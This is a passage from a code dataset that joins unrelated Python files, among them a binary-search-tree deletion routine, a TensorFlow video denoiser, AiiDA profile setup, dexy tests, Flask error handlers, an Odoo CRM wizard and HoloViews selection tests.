past_workshops=past_workshops,
self_paced=self_paced,
recorded_workshops=recorded_workshops
).encode("utf-8"))
with open("past.html", "w") as f:
f.write(template.render(
title="Container Training",
all_past_workshops=past_workshops
).encode("utf-8"))
| StarcoderdataPython |
1648985 | <filename>Binary_Search_Tree/2-bst-deletion.py
class Node:
def __init__(self, key):
self.key = key
self.left = None
self.right = None
def inorder(root):
if root is not None:
inorder(root.left)
print(root.key, end=" ")
inorder(root.right)
def insert(node, key):
if node is None:
return Node(key)
if key < node.key:
node.left = insert(node.left, key)
else:
node.right = insert(node.right, key)
return node
def deleteNode(root, key):
# Base Case
if root is None:
return root
if key < root.key:
root.left = deleteNode(root.left, key)
return root
elif(key > root.key):
root.right = deleteNode(root.right, key)
return root
if root.left is None and root.right is None:
return None
if root.left is None:
temp = root.right
root = None
return temp
elif root.right is None:
temp = root.left
root = None
return temp
succParent = root
succ = root.right
while succ.left != None:
succParent = succ
succ = succ.left
if succParent != root:
succParent.left = succ.right
else:
succParent.right = succ.right
root.key = succ.key
return root
root = None
root = insert(root, 50)
root = insert(root, 30)
root = insert(root, 20)
root = insert(root, 40)
root = insert(root, 70)
root = insert(root, 60)
root = insert(root, 80)
print("Inorder traversal of the given tree")
inorder(root)
print("\nDelete 20")
root = deleteNode(root, 20)
print("Inorder traversal of the modified tree")
inorder(root)
print("\nDelete 30")
root = deleteNode(root, 30)
print("Inorder traversal of the modified tree")
inorder(root)
print("\nDelete 50")
root = deleteNode(root, 50)
print("Inorder traversal of the modified tree")
inorder(root)
| StarcoderdataPython |
1615875 | # -*- coding: utf-8 -*-
"""
@author: clausmichele
"""
import time
import tensorflow as tf
import cv2
import numpy as np
from tqdm import tqdm
def SpatialCNN(input, is_training=False, output_channels=3, reuse=tf.AUTO_REUSE):
with tf.variable_scope('block1',reuse=reuse):
output = tf.layers.conv2d(input, 128, 3, padding='same', activation=tf.nn.relu)
for layers in range(2, 20):
with tf.variable_scope('block%d' % layers,reuse=reuse):
output = tf.layers.conv2d(output, 64, 3, padding='same', name='conv%d' % layers, use_bias=False)
output = tf.nn.relu(tf.layers.batch_normalization(output, training=is_training))
with tf.variable_scope('block20', reuse=reuse):
output = tf.layers.conv2d(output, output_channels, 3, padding='same', use_bias=False)
return input - output
def Temp3CNN(input, is_training=False, output_channels=3, reuse=tf.AUTO_REUSE):
input_middle = input[:,:,:,3:6]
with tf.variable_scope('temp-block1',reuse=reuse):
output = tf.layers.conv2d(input, 128, 3, padding='same', activation=tf.nn.leaky_relu)
for layers in range(2, 20):
with tf.variable_scope('temp-block%d' % layers,reuse=reuse):
output = tf.layers.conv2d(output, 64, 3, padding='same', name='conv%d' % layers, use_bias=False)
output = tf.nn.leaky_relu(output)
with tf.variable_scope('temp-block20', reuse=reuse):
output = tf.layers.conv2d(output, output_channels, 3, padding='same', use_bias=False)
return input_middle - output
class ViDeNN(object):
def __init__(self, sess):
self.sess = sess
# build model
self.Y_ = tf.placeholder(tf.float32, [None, None, None, 3],name='clean_image')
self.X = tf.placeholder(tf.float32, [None, None, None, 3],name='noisy_image')
self.Y = SpatialCNN(self.X)
self.Y_frames = tf.placeholder(tf.float32, [None, None, None, 9],name='clean_frames')
self.Xframes = tf.placeholder(tf.float32, [None, None, None, 9],name='noisy_frames')
self.Yframes = Temp3CNN(self.Xframes)
init = tf.global_variables_initializer()
self.sess.run(init)
print("[*] Initialize model successfully...")
def denoise(self, eval_files, eval_files_noisy, print_psnr, ckpt_dir, save_dir):
# init variables
tf.global_variables_initializer().run()
assert len(eval_files) != 0, '[!] No testing data!'
if ckpt_dir is None:
full_path = tf.train.latest_checkpoint('./Temp3-CNN/ckpt')
if(full_path is None):
print('[!] No Temp3-CNN checkpoint!')
quit()
vars_to_restore_temp3CNN = {}
for i in range(len(tf.global_variables())):
if tf.global_variables()[i].name[0] != 'b':
a = tf.global_variables()[i].name.split(':')[0]
vars_to_restore_temp3CNN[a] = tf.global_variables()[i]
saver_t = tf.train.Saver(var_list=vars_to_restore_temp3CNN)
saver_t.restore(self.sess, full_path)
full_path = tf.train.latest_checkpoint('./Spatial-CNN/ckpt_awgn')
if(full_path is None):
print('[!] No Spatial-CNN checkpoint!')
quit()
vars_to_restore_spatialCNN = {}
for i in range(len(tf.global_variables())):
if tf.global_variables()[i].name[0] != 't':
a = tf.global_variables()[i].name.split(':')[0]
vars_to_restore_spatialCNN[a] = tf.global_variables()[i]
saver_s = tf.train.Saver(var_list=vars_to_restore_spatialCNN)
saver_s.restore(self.sess, full_path)
else:
load_model_status, _ = self.load(ckpt_dir)
print("[*] Model restore successfully!")
#
psnr_sum = 0
start = time.time()
for idx in tqdm(range(len(eval_files)-1)):
if idx==0:
test = cv2.imread(eval_files[idx])
test1 = cv2.imread(eval_files[idx+1])
test2 = cv2.imread(eval_files[idx+2])
noisy = cv2.imread(eval_files_noisy[idx])
noisy1 = cv2.imread(eval_files_noisy[idx+1])
noisy2 = cv2.imread(eval_files_noisy[idx+2])
test = test.astype(np.float32) / 255.0
test1 = test1.astype(np.float32) / 255.0
test2 = test2.astype(np.float32) / 255.0
noisy = noisy.astype(np.float32) / 255.0
noisy1 = noisy1.astype(np.float32) / 255.0
noisy2 = noisy2.astype(np.float32) / 255.0
noisyin2 = np.zeros((1,test.shape[0],test.shape[1],9))
current = np.zeros((test.shape[0],test.shape[1],3))
previous = np.zeros((test.shape[0],test.shape[1],3))
noisyin = np.zeros((3,test.shape[0],test.shape[1],3))
noisyin[0] = noisy
noisyin[1] = noisy1
noisyin[2] = noisy2
out = self.sess.run([self.Y],feed_dict={self.X:noisyin})
out = np.asarray(out)
noisyin2[0,:,:,0:3] = out[0,0]
noisyin2[0,:,:,3:6] = out[0,0]
noisyin2[0,:,:,6:] = out[0,1]
temp_clean_image= self.sess.run([self.Yframes],feed_dict={self.Xframes:noisyin2})
temp_clean_image = np.asarray(temp_clean_image)
cv2.imwrite(save_dir + '/%04d.png'%idx,temp_clean_image[0,0]*255)
psnr = psnr_scaled(test,temp_clean_image[0,0])
psnr1 = psnr_scaled(test,out[0,0])
psnr_sum += psnr
if print_psnr: print(" frame %d denoised, PSNR: %.2f" % (idx, psnr))
else: print(" frame %d denoised" % (idx))
noisyin2[0,:,:,0:3] = out[0,0]
noisyin2[0,:,:,3:6] = out[0,1]
noisyin2[0,:,:,6:] = out[0,2]
current[:,:,:] = out[0,2,:,:,:]
previous[:,:,:] = out[0,1,:,:,:]
else:
if idx<(len(eval_files)-2):
test3 = cv2.imread(eval_files[idx+2])
test3 = test3.astype(np.float32) / 255.0
noisy3 = cv2.imread(eval_files_noisy[idx+2])
noisy3 = noisy3.astype(np.float32) / 255.0
out2 = self.sess.run([self.Y],feed_dict={self.X:np.expand_dims(noisy3,0)})
out2 = np.asarray(out2)
noisyin2[0,:,:,0:3] = previous
noisyin2[0,:,:,3:6] = current
noisyin2[0,:,:,6:] = out2[0,0]
previous = current
current = out2[0,0]
else:
try:
out2
except NameError:
out2 = np.zeros((out.shape))
out2=out
out2[0,0]=out[0,2]
noisyin2[0,:,:,0:3] = current
noisyin2[0,:,:,3:6] = out2[0,0]
noisyin2[0,:,:,6:] = out2[0,0]
temp_clean_image= self.sess.run([self.Yframes],feed_dict={self.Xframes:noisyin2})
temp_clean_image = np.asarray(temp_clean_image)
cv2.imwrite(save_dir+ '/%04d.png'%(idx+1),temp_clean_image[0,0]*255)
# calculate PSNR
if idx==0:
psnr1 = psnr_scaled(test1,out[0,1])
psnr = psnr_scaled(test1, temp_clean_image[0,0])
else:
psnr1 = psnr_scaled(test2,previous)
psnr = psnr_scaled(test2, temp_clean_image[0,0])
try:
test3
except NameError:
test3=test2
test2=test3
if print_psnr: print(" frame %d denoised, PSNR: %.2f" % (idx+1, psnr))
else: print(" frame %d denoised" % (idx+1))
psnr_sum += psnr
avg_psnr = psnr_sum / len(eval_files)
if print_psnr: print("--- Average PSNR %.2f ---" % avg_psnr)
print("--- Elapsed time: %.4fs" %(time.time()-start))
def load(self, checkpoint_dir):
print("[*] Reading checkpoint...")
saver = tf.train.Saver()
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
full_path = tf.train.latest_checkpoint(checkpoint_dir)
global_step = int(full_path.split('/')[-1].split('-')[-1])
saver.restore(self.sess, full_path)
return True, global_step
else:
return False, 0
def psnr_scaled(im1, im2): # PSNR function for 0-1 values
mse = ((im1 - im2) ** 2).mean()
mse = mse * (255 ** 2)
psnr = 10 * np.log10(255 **2 / mse)
return psnr
| StarcoderdataPython |
3309896 | #!/usr/bin/env python3
import argparse
import mwbot
import vowi
def count_excluded_resources():
current_lvas = []
for title in site.get('askargs', conditions='Category:LVAs|Ist veraltet::0', parameters='limit=9999')['query']['results']:
current_lvas.append(title)
duplicates = []
excluded = 0
for page in site.results(generator='allpages', gapnamespace=mwbot.NS_FILE,
gaplimit='max', prop='links|duplicatefiles', pllimit='max', dflimit='max'):
if page['title'] in duplicates:
excluded += 1
elif 'links' in page:
for link in page['links']:
if link['title'] in current_lvas:
if 'duplicatefiles' in page:
for dup in page['duplicatefiles']:
duplicates.append('Datei:'+dup['name'].replace('_', ' '))
break
else:
excluded += 1
for ns in vowi.UNI_NAMESPACES:
for p in site.results(list='allpages', apfilterredir='nonredirects', apnamespace=ns, aplimit='max'):
if '/' in p['title']:
if not p['title'].split('/', 1)[0] in current_lvas:
excluded += 1
return excluded
if __name__ == '__main__':
parser = mwbot.get_argparser()
args = parser.parse_args()
site = mwbot.getsite('excluded_mat_counter.py', args)
count = count_excluded_resources()
print(count)
mwbot.save(site, 'Vorlage:!materialien anzahl/exkludiert', None, count, site.msg('update'))
| StarcoderdataPython |
1621534 | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 22 01:59:25 2020
@author: nacer
"""
"""
Problem link : https://leetcode.com/problems/palindrome-number/
"""
class Solution:
def isPalindrome(self, x: int) -> bool:
if(x<0):
return False
return x - reverse(x) == 0
def reverse(x):
n = 0
while(x>0):
n *= 10
n += x%10
x = x//10
return n | StarcoderdataPython |
4835944 | # -*- coding: utf-8 -*-
# pylint: disable=superfluous-parens,too-many-locals,too-many-statements,too-many-branches
"""Functions to create, inspect and manipulate profiles in the configuration file."""
import os
import sys
import click
def setup_profile(profile, only_config, set_default=False, non_interactive=False, **kwargs):
"""
Setup an AiiDA profile and AiiDA user (and the AiiDA default user).
:param profile: Profile name
:param only_config: do not create a new user
:param set_default: set the new profile as the default
:param non_interactive: do not prompt for configuration values, fail if not all values are given as kwargs.
:param backend: one of 'django', 'sqlalchemy'
:param email: valid email address for the user
:param db_host: hostname for the database
:param db_port: port to connect to the database
:param db_user: name of the db user
:param db_pass: password of the db <PASSWORD>
"""
from aiida.backends import settings
from aiida.backends.profile import BACKEND_SQLA, BACKEND_DJANGO
from aiida.backends.utils import set_backend_type
from aiida.cmdline import EXECNAME
from aiida.cmdline.commands import cmd_user
from aiida.common.exceptions import InvalidOperation
from aiida.common.setup import (create_base_dirs, create_configuration, set_default_profile, DEFAULT_UMASK,
create_config_noninteractive)
only_user_config = only_config
# Create the directories to store the configuration files
create_base_dirs()
if settings.AIIDADB_PROFILE and profile:
sys.exit('the profile argument cannot be used if verdi is called with -p option: {} and {}'.format(
settings.AIIDADB_PROFILE, profile))
gprofile = settings.AIIDADB_PROFILE or profile
if gprofile == profile:
settings.AIIDADB_PROFILE = profile
if not settings.AIIDADB_PROFILE:
settings.AIIDADB_PROFILE = 'default'
# used internally later
gprofile = settings.AIIDADB_PROFILE
created_conf = None
# ask and store the configuration of the DB
if non_interactive:
try:
created_conf = create_config_noninteractive(
profile=gprofile,
backend=kwargs['backend'],
email=kwargs['email'],
db_host=kwargs['db_host'],
db_port=kwargs['db_port'],
db_name=kwargs['db_name'],
db_user=kwargs['db_user'],
db_pass=kwargs.get('db_pass', ''),
repo=kwargs['repo'],
force_overwrite=kwargs.get('force_overwrite', False))
except ValueError as exception:
click.echo("Error during configuation: {}".format(exception.message), err=True)
sys.exit(1)
except KeyError as exception:
import traceback
click.echo(traceback.format_exc())
click.echo(
"--non-interactive requires all values to be given on the commandline! Missing argument: {}".format(
exception.message),
err=True)
sys.exit(1)
else:
try:
created_conf = create_configuration(profile=gprofile)
except ValueError as exception:
print >> sys.stderr, "Error during configuration: {}".format(exception.message)
sys.exit(1)
# Set default DB profile
set_default_profile(gprofile, force_rewrite=False)
if only_user_config:
print("Only user configuration requested, " "skipping the migrate command")
else:
print("Executing now a migrate command...")
backend_choice = created_conf['AIIDADB_BACKEND']
if backend_choice == BACKEND_DJANGO:
print("...for Django backend")
# The correct profile is selected within load_dbenv.
# Setting os.umask here since sqlite database gets created in
# this step.
old_umask = os.umask(DEFAULT_UMASK)
# This check should be done more properly
# try:
# backend_type = get_backend_type()
# except KeyError:
# backend_type = None
#
# if backend_type is not None and backend_type != BACKEND_DJANGO:
# raise InvalidOperation("An already existing database found"
# "and a different than the selected"
# "backend was used for its "
# "management.")
try:
from aiida.backends.djsite.utils import pass_to_django_manage
pass_to_django_manage([EXECNAME, 'migrate'], profile=gprofile)
finally:
os.umask(old_umask)
set_backend_type(BACKEND_DJANGO)
elif backend_choice == BACKEND_SQLA:
print("...for SQLAlchemy backend")
from aiida import is_dbenv_loaded
from aiida.backends.sqlalchemy.utils import _load_dbenv_noschemacheck, check_schema_version
from aiida.backends.profile import load_profile
# We avoid calling load_dbenv since we want to force the schema
# migration
if not is_dbenv_loaded():
settings.LOAD_DBENV_CALLED = True
# This is going to set global variables in settings, including settings.BACKEND
load_profile()
_load_dbenv_noschemacheck()
# Perform the needed migration quietly
check_schema_version(force_migration=True)
set_backend_type(BACKEND_SQLA)
else:
raise InvalidOperation("Not supported backend selected.")
print("Database was created successfully")
# I create here the default user
print("Loading new environment...")
if only_user_config:
from aiida.backends.utils import load_dbenv, is_dbenv_loaded
# db environment has not been loaded in this case
if not is_dbenv_loaded():
load_dbenv()
from aiida.common.setup import DEFAULT_AIIDA_USER
from aiida.orm.backend import construct_backend
backend = construct_backend()
if not backend.users.find(email=DEFAULT_AIIDA_USER):
print("Installing default AiiDA user...")
nuser = backend.users.create(email=DEFAULT_AIIDA_USER, first_name="AiiDA", last_name="Daemon")
nuser.is_active = True
nuser.store()
from aiida.common.utils import get_configured_user_email
email = get_configured_user_email()
print("Starting user configuration for {}...".format(email))
if email == DEFAULT_AIIDA_USER:
print("You set up AiiDA using the default Daemon email ({}),".format(email))
print("therefore no further user configuration will be asked.")
else:
if non_interactive:
# Here we map the keyword arguments onto the command line arguments
# for verdi user configure. We have to be careful that there the
# argument names are the same as those int he kwargs dict
commands = [kwargs['email'], '--non-interactive']
for arg in ('first_name', 'last_name', 'institution'):
value = kwargs.get(arg, None)
if value is not None:
commands.extend(('--{}'.format(arg.replace('_', '-')), str(value)))
else:
commands = [email]
# Ask to configure the user
try:
# pylint: disable=no-value-for-parameter
cmd_user.configure(commands)
except SystemExit:
# Have to catch this as the configure command will do a sys.exit()
pass
if set_default:
set_default_profile(profile, force_rewrite=True)
print("Setup finished.")
| StarcoderdataPython |
1605021 | from subprocess import check_output
import sys
objects = check_output(["ar", "-t", sys.argv[1]]).decode().split("\n")
for object in objects:
if not object.endswith(".o") or object.endswith("lso.o"):
continue
check_output(["ar", "-xv", sys.argv[1], object])
| StarcoderdataPython |
1641290 | from dexy.doc import Doc
from dexy.node import Node
from dexy.node import PatternNode
from dexy.wrapper import Wrapper
from tests.utils import wrap
import dexy.doc
import dexy.node
import os
import time
def test_create_node():
with wrap() as wrapper:
node = dexy.node.Node.create_instance(
"doc",
"foo.txt",
wrapper,
[],
# kwargs
foo='bar',
contents="these are contents"
)
assert node.__class__ == dexy.doc.Doc
assert node.args['foo'] == 'bar'
assert node.wrapper == wrapper
assert node.inputs == []
assert len(node.hashid) == 32
def test_node_arg_caching():
with wrap() as wrapper:
wrapper.nodes = {}
node = dexy.node.Node("foo", wrapper, [], foo='bar', baz=123)
wrapper.add_node(node)
assert node.hashid == 'acbd18db4cc2f85cedef654fccc4a4d8'
assert node.args['foo'] == 'bar'
assert node.args['baz'] == 123
assert node.sorted_arg_string() == '[["baz", 123], ["foo", "bar"]]'
assert os.path.exists(wrapper.artifacts_dir)
assert not os.path.exists(wrapper.node_argstrings_filename())
wrapper.save_node_argstrings()
assert os.path.exists(wrapper.node_argstrings_filename())
wrapper.load_node_argstrings()
assert not node.check_args_changed()
node.args['baz'] = 456
assert node.check_args_changed()
wrapper.save_node_argstrings()
wrapper.load_node_argstrings()
assert not node.check_args_changed()
SCRIPT_YAML = """
script:scriptnode:
- start.sh|shint
- middle.sh|shint
- end.sh|shint
"""
def test_script_node_caching__slow():
with wrap():
with open("start.sh", "w") as f:
f.write("pwd")
with open("middle.sh", "w") as f:
f.write("echo `time`")
with open("end.sh", "w") as f:
f.write("echo 'done'")
with open("dexy.yaml", "w") as f:
f.write(SCRIPT_YAML)
wrapper1 = Wrapper(log_level="DEBUG")
wrapper1.run_from_new()
for node in list(wrapper1.nodes.values()):
assert node.state == 'ran'
wrapper2 = Wrapper()
wrapper2.run_from_new()
for node in list(wrapper2.nodes.values()):
assert node.state == 'consolidated'
time.sleep(1.1)
with open("middle.sh", "w") as f:
f.write("echo 'new'")
wrapper3 = Wrapper()
wrapper3.run_from_new()
for node in list(wrapper1.nodes.values()):
assert node.state == 'ran'
# TODO mock out os.stat to get different mtimes without having to sleep?
def test_node_caching__slow():
with wrap() as wrapper:
with open("hello.py", "w") as f:
f.write("print(1+2)\n")
with open("doc.txt", "w") as f:
f.write("1 + 1 = {{ d['hello.py|py'] }}")
wrapper = Wrapper(log_level='DEBUG')
hello_py = Doc("hello.py|py", wrapper)
doc_txt = Doc("doc.txt|jinja",
wrapper,
[hello_py]
)
wrapper.run_docs(doc_txt)
assert str(doc_txt.output_data()) == "1 + 1 = 3\n"
assert str(hello_py.output_data()) == "3\n"
assert hello_py.state == 'ran'
assert doc_txt.state == 'ran'
wrapper = Wrapper(log_level='DEBUG')
hello_py = Doc("hello.py|py", wrapper)
doc_txt = Doc("doc.txt|jinja",
wrapper,
[hello_py]
)
wrapper.run_docs(doc_txt)
assert hello_py.state == 'consolidated'
assert doc_txt.state == 'consolidated'
time.sleep(1.1)
with open("doc.txt", "w") as f:
f.write("1 + 1 = {{ d['hello.py|py'] }}\n")
wrapper = Wrapper(log_level='DEBUG')
hello_py = Doc("hello.py|py", wrapper)
doc_txt = Doc("doc.txt|jinja",
wrapper,
[hello_py]
)
wrapper.run_docs(doc_txt)
assert hello_py.state == 'consolidated'
assert doc_txt.state == 'ran'
time.sleep(1.1)
with open("hello.py", "w") as f:
f.write("print(1+1)\n")
wrapper = Wrapper(log_level='DEBUG')
hello_py = Doc("hello.py|py", wrapper)
doc_txt = Doc("doc.txt|jinja",
wrapper,
[hello_py]
)
wrapper.run_docs(doc_txt)
assert hello_py.state == 'ran'
assert doc_txt.state == 'ran'
def test_node_init_with_inputs():
with wrap() as wrapper:
node = Node("foo.txt",
wrapper,
[Node("bar.txt", wrapper)]
)
assert node.key == "foo.txt"
assert node.inputs[0].key == "bar.txt"
expected = {
0 : "bar.txt",
1 : "foo.txt"
}
for i, n in enumerate(node.walk_inputs()):
assert expected[i] == n.key
def test_doc_node_populate():
with wrap() as wrapper:
node = Node.create_instance(
'doc', "foo.txt", wrapper,
[], contents='foo')
assert node.key_with_class() == "doc:foo.txt"
def test_doc_node_with_filters():
with wrap() as wrapper:
node = Node.create_instance('doc',
"foo.txt|outputabc", wrapper, [], contents='foo')
assert node.key_with_class() == "doc:foo.txt|outputabc"
def test_pattern_node():
with wrap() as wrapper:
with open("foo.txt", "w") as f:
f.write("foo!")
with open("bar.txt", "w") as f:
f.write("bar!")
wrapper = Wrapper(log_level='DEBUG')
wrapper.to_valid()
wrapper.nodes = {}
wrapper.roots = []
wrapper.batch = dexy.batch.Batch(wrapper)
wrapper.filemap = wrapper.map_files()
node = PatternNode("*.txt",
wrapper,
[],
foo="bar")
assert node.args['foo'] == 'bar'
wrapper.run_docs(node)
assert len(node.children) == 2
for child in node.children:
assert child.__class__.__name__ == "Doc"
assert child.args['foo'] == 'bar'
assert child.key_with_class() in ["doc:foo.txt", "doc:bar.txt"]
assert child.filters == []
def test_pattern_node_multiple_filters():
with wrap() as wrapper:
with open("foo.txt", "w") as f:
f.write("foo!")
wrapper = Wrapper(log_level='DEBUG')
wrapper.to_valid()
wrapper.nodes = {}
wrapper.roots = []
wrapper.batch = dexy.batch.Batch(wrapper)
wrapper.filemap = wrapper.map_files()
node = PatternNode("*.txt|dexy|dexy|dexy", wrapper=wrapper)
doc = node.children[0]
assert doc.key == "foo.txt|dexy|dexy|dexy"
assert doc.filter_aliases == ['dexy', 'dexy', 'dexy']
assert doc.parent == node
def test_pattern_node_one_filter():
with wrap() as wrapper:
with open("foo.txt", "w") as f:
f.write("foo!")
wrapper = Wrapper(log_level='DEBUG')
wrapper.to_valid()
wrapper.nodes = {}
wrapper.roots = []
wrapper.batch = dexy.batch.Batch(wrapper)
wrapper.filemap = wrapper.map_files()
node = PatternNode("*.txt|dexy", wrapper=wrapper)
doc = node.children[0]
assert doc.key == "<KEY>"
assert doc.filter_aliases == ['dexy']
assert doc.parent == node
| StarcoderdataPython |
3398609 | <gh_stars>1-10
from http import HTTPStatus
from typing import Union
from flask import make_response, Response, Flask
from webargs import ValidationError
from webargs.flaskparser import parser
from werkzeug.exceptions import BadRequest
from src.extensions import jwt_manager
AUTH_ERROR = 'Authentication failed'
def error_response(message: Union[str, dict],
status_code: int,
**additional_information: dict) -> Response:
"""Common error response to ensure that API error output has the same format"""
common_struct = dict(error=message, status_code=status_code, additional_information=additional_information)
resp = make_response(common_struct, status_code)
return resp
def item_not_found_response(item_repr: str, searched_id: Union[str, int] = None) -> Response:
if searched_id is not None:
item_repr += f'(id: {searched_id!r})'
return error_response(f'Could not find item <{item_repr}>', HTTPStatus.NOT_FOUND)
def auth_error():
return error_response(AUTH_ERROR, HTTPStatus.UNAUTHORIZED)
def register_exceptions_handles(app: Flask):
@app.errorhandler(HTTPStatus.METHOD_NOT_ALLOWED)
def not_allowed(e) -> Response:
return error_response(str(e), HTTPStatus.METHOD_NOT_ALLOWED)
@app.errorhandler(HTTPStatus.NOT_FOUND)
def not_found(e) -> Response:
return error_response(str(e), HTTPStatus.NOT_FOUND)
@app.errorhandler(HTTPStatus.INTERNAL_SERVER_ERROR)
def internal_error(e) -> Response:
return error_response(str(e), HTTPStatus.INTERNAL_SERVER_ERROR)
@app.errorhandler(HTTPStatus.BAD_REQUEST)
def bad_request(e) -> Response:
return error_response(e.response, HTTPStatus.BAD_REQUEST)
@parser.error_handler
def handle_error(error: ValidationError, req, schema, *, error_status_code, error_headers):
error = error.messages.get('json')
raise BadRequest('Invalid args were passed', response=error)
@jwt_manager.expired_token_loader
def expired_token_response(*args) -> Response:
return auth_error()
@jwt_manager.invalid_token_loader
def invalid_token_response(*args) -> Response:
return auth_error()
@jwt_manager.unauthorized_loader
def no_jwt_is_present(*args) -> Response:
return auth_error()
| StarcoderdataPython |
115694 | <reponame>robscetury/hbos
import typing
from typing import Dict
from pandas import DataFrame
from hbos_server.outputbase import OutputBase
class DeleteSourceOutput(OutputBase):
def output(self, name: str, input_data: Dict[str,DataFrame]) -> typing.Tuple[str, object]:
"""
This output filter will delete data sets that are no longer needed...for example,
one that has been collated and you do not want to delete the data.
[Unlike MergeOutput, CollateOuput does NOT delete the relevant data as it might be used as part of a later output filter.]
"""
for del_to_key in self.options["deleteKeys"]:
del input_data[del_to_key]
return name, input_data | StarcoderdataPython |
1614666 | <filename>commands/__init__.py
from . import get_runtimes
from . import get_help
from . import run_code
from . import remind
from . import inspiration
from . import roll
from . import alerts
from . import update_presence
from . import add_bad_reply | StarcoderdataPython |
3371666 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class crm_partner_binding(osv.osv_memory):
"""
Handle the partner binding or generation in any CRM wizard that requires
such feature, like the lead2opportunity wizard, or the
phonecall2opportunity wizard. Try to find a matching partner from the
CRM model's information (name, email, phone number, etc) or create a new
one on the fly.
Use it like a mixin with the wizard of your choice.
"""
_name = 'crm.partner.binding'
_description = 'Handle partner binding or generation in CRM wizards.'
_columns = {
'action': fields.selection([
('exist', 'Link to an existing customer'),
('create', 'Create a new customer'),
('nothing', 'Do not link to a customer')
], 'Related Customer', required=True),
'partner_id': fields.many2one('res.partner', 'Customer'),
}
def _find_matching_partner(self, cr, uid, context=None):
"""
Try to find a matching partner regarding the active model data, like
the customer's name, email, phone number, etc.
:return int partner_id if any, False otherwise
"""
if context is None:
context = {}
partner_id = False
partner_obj = self.pool.get('res.partner')
# The active model has to be a lead or a phonecall
if (context.get('active_model') == 'crm.lead') and context.get('active_id'):
active_model = self.pool.get('crm.lead').browse(cr, uid, context.get('active_id'), context=context)
elif (context.get('active_model') == 'crm.phonecall') and context.get('active_id'):
active_model = self.pool.get('crm.phonecall').browse(cr, uid, context.get('active_id'), context=context)
# Find the best matching partner for the active model
if (active_model):
partner_obj = self.pool.get('res.partner')
# A partner is set already
if active_model.partner_id:
partner_id = active_model.partner_id.id
# Search through the existing partners based on the lead's email
elif active_model.email_from:
partner_ids = partner_obj.search(cr, uid, [('email', '=', active_model.email_from)], context=context)
if partner_ids:
partner_id = partner_ids[0]
# Search through the existing partners based on the lead's partner or contact name
elif active_model.partner_name:
partner_ids = partner_obj.search(cr, uid, [('name', 'ilike', '%'+active_model.partner_name+'%')], context=context)
if partner_ids:
partner_id = partner_ids[0]
elif active_model.contact_name:
partner_ids = partner_obj.search(cr, uid, [
('name', 'ilike', '%'+active_model.contact_name+'%')], context=context)
if partner_ids:
partner_id = partner_ids[0]
return partner_id
def default_get(self, cr, uid, fields, context=None):
res = super(crm_partner_binding, self).default_get(cr, uid, fields, context=context)
partner_id = self._find_matching_partner(cr, uid, context=context)
if 'action' in fields:
res['action'] = partner_id and 'exist' or 'create'
if 'partner_id' in fields:
res['partner_id'] = partner_id
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| StarcoderdataPython |
1715326 | from unittest import SkipTest, skip, skipIf
import holoviews as hv
import pandas as pd
from holoviews.core.options import Store
from holoviews.selection import link_selections
from holoviews.element.comparison import ComparisonTestCase
try:
from holoviews.operation.datashader import datashade, dynspread
except:
datashade = None
ds_skip = skipIf(datashade is None, "Datashader not available")
class TestLinkSelections(ComparisonTestCase):
def setUp(self):
if type(self) is TestLinkSelections:
# Only run tests in subclasses
raise SkipTest("Not supported")
self.data = pd.DataFrame(
{'x': [1, 2, 3],
'y': [0, 3, 2],
'e': [1, 1.5, 2],
},
columns=['x', 'y', 'e']
)
def element_color(self, element):
raise NotImplementedError
def element_visible(self, element):
raise NotImplementedError
def check_base_scatter_like(self, base_scatter, lnk_sel, data=None):
if data is None:
data = self.data
self.assertEqual(
self.element_color(base_scatter),
lnk_sel.unselected_color
)
self.assertTrue(self.element_visible(base_scatter))
self.assertEqual(base_scatter.data, data)
def check_overlay_scatter_like(self, overlay_scatter, lnk_sel, data):
self.assertEqual(
self.element_color(overlay_scatter),
lnk_sel.selected_color
)
self.assertEqual(
self.element_visible(overlay_scatter),
len(data) != len(self.data)
)
self.assertEqual(overlay_scatter.data, data)
def test_scatter_selection(self, dynamic=False):
scatter = hv.Scatter(self.data, kdims='x', vdims='y')
if dynamic:
# Convert scatter to DynamicMap that returns the element
scatter = hv.util.Dynamic(scatter)
lnk_sel = link_selections.instance()
linked = lnk_sel(scatter)
current_obj = linked[()]
# Check initial state of linked dynamic map
self.assertIsInstance(current_obj, hv.Overlay)
# Check initial base layer
self.check_base_scatter_like(current_obj.Scatter.I, lnk_sel)
# Check selection layer
self.check_overlay_scatter_like(current_obj.Scatter.II, lnk_sel, self.data)
# Perform selection of second and third point
boundsxy = lnk_sel._selection_expr_streams[0]._source_streams[0]
self.assertIsInstance(boundsxy, hv.streams.BoundsXY)
boundsxy.event(bounds=(0, 1, 5, 5))
current_obj = linked[()]
# Check that base layer is unchanged
self.check_base_scatter_like(current_obj.Scatter.I, lnk_sel)
# Check selection layer
self.check_overlay_scatter_like(current_obj.Scatter.II, lnk_sel, self.data.iloc[1:])
def test_scatter_selection_dynamic(self):
self.test_scatter_selection(dynamic=True)
def test_layout_selection_scatter_table(self):
scatter = hv.Scatter(self.data, kdims='x', vdims='y')
table = hv.Table(self.data)
lnk_sel = link_selections.instance()
linked = lnk_sel(scatter + table)
current_obj = linked[()]
# Check initial base scatter
self.check_base_scatter_like(
current_obj[0][()].Scatter.I,
lnk_sel
)
# Check initial selection scatter
self.check_overlay_scatter_like(
current_obj[0][()].Scatter.II,
lnk_sel,
self.data
)
# Check initial table
self.assertEqual(
self.element_color(current_obj[1][()]),
[lnk_sel.unselected_color] * len(self.data)
)
# Select first and third point
boundsxy = lnk_sel._selection_expr_streams[0]._source_streams[0]
boundsxy.event(bounds=(0, 0, 4, 2))
current_obj = linked[()]
# Check base scatter
self.check_base_scatter_like(
current_obj[0][()].Scatter.I,
lnk_sel
)
# Check selection scatter
self.check_overlay_scatter_like(
